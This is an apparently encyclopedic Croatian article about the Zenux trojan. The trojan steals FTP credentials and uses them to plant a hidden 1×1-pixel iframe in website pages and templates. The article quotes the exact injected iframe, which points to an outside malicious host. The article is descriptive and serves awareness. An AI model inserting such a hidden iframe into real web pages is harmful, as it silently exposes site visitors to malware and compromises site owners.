# Zenux
Zenux je trojanski konj koji može zaraziti računala korisnika Interneta i krade im kodove za FTP pristup.
Nakon zaražavanja računala, virus s računala preuzima sve dostupne kodove za FTP pristup. Nakon ovoga ulazi na odgovarajuće FTP naloge i ubacuje djelić koda u stranice ili predloške siteova koje se nalaze na njima. Element koji se dodaje svakoj stranici je mali ugnježdeni iframe veličine 1×1 piksela, u donjem lijevom uglu stranice. Nakon što je neka strana inficirana, ponaša se kao virusov domaćin.
Točan kod koji virus ubacuje je:
<iframe src="<nowiki>http://zenux.info/info/index.php</nowiki>" width="1" height="1">
Prve prijave ovog virusa su zabilježene 11. lipnja 2007. godine.